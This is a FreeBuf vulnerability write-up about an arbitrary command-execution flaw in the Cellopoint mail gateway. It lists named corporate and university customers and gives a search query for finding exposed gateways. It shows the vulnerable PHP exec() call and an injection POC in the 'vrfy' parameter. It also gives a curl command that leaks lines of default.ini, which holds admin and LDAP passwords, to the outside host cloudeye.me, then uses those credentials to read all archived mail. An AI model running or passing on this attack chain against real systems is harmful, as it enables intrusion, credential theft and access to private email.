freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

cellopoint 邮件网关任意命令执行漏洞
2018-01-19 14:12:42

使用http://cn.bing.com/search?q=cellopoint+reporter&go=Search&qs=ds&ajf=60&first=52&FORM=PORE可以查看到诸多使用 cellopoint 邮件网关的大型企业。

客户包括:国美集团东软集团松下电器有限公司清华大学上海交通大学逢甲大学 VIP ABC 仁宝计算机股份有限公司富士康国际控股有限公司上海机场 (集团) 有限公司丰田汽车(中国)投资有限公司广州滚石移动网络有限公司麦网电子商务 (上海) 有限公司快特电波科技有限公司东方花旗证券有限公司金元证券股份有限公司华鑫证券责任有限公司湘财证券有限责任公司中海基金管理有限公司天平汽车保险股份有限公司。zend 解密

测试发现reporter目录下的gw_x_vrfy_n_test.php文件存在一处命令执行:

$email = $_GET["email"];$vrfy = $_GET["vrfy"]; 

$file = (isset($_GET["file"]) ? $_GET["file"] : $ini_default);

$debugFile = "/tmp/vrfy-test.err";$cmd = $GLOBALS["TopFileRoot"] . "smtpd/celloauth -v " . . " -n $vrfy -d 2> debugFile";

exec($cmd, $output, $ret);

$lines = @file($debugFile); 

URL内构造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd;

的方式可以利用该漏洞执行命令(nobody权限)。

排查发现/usr/local/mozart/smtpd/default.ini文件保存各项邮件管理员、ldap等账户密码信息。

构造以下sed命令(通过sed命令读取目标文件单行内容):

curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini),

通过查阅远端服务器(例如cloudeye.me)的web日志信息,

回显获取到default.ini文件内容,得到邮件归档管理员admin的口令或者配置的ldap密码,访问 $ip/report/login.php 登陆查阅全部邮件内容。

 

# 漏洞
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者